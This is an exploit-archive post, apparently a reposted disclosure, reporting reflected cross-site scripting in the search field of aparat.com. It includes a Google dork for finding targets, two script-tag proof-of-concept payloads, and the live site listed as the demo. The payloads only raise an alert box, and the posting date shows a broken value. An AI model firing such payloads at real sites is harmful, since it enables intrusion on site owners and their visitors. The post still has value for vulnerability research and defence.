Aparat Cross Site Scripting

Posted on 30 November -0001
<HTML><HEAD><TITLE>aparat Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>##########################
# Exploit Title: aparat Cross Site Scripting
# Google Dork : intext: "aparat.com"
# Date:2017-03-12
# Discovered By:Turk@Xtra
# Tested on : Win7
##########################

# Vulnerability is the site search field

An attacker using script code can do your attack

After searching the attackers script code 404 is facing the same situation again click on

Checker can see your attack

<script>alert('Xss!')</script>
"><script>alert(/Xss/)</script>

##########################

# Demo :

http://www.aparat.com/

#############################

# Thanks to : the Group Priv8_T34M ~~> Blackwolf||Ormazd ||Khatar ||mohammad Pn ||Criminal ||Rabinson.

# Channel Priv8_T34M : https://t.me/PRIV8_T34M

# Iranian Anonymous

# Discovered By: Saman.Khan</BODY></HTML>
TOP
Malware :

Last 20
Exploits :

Last 20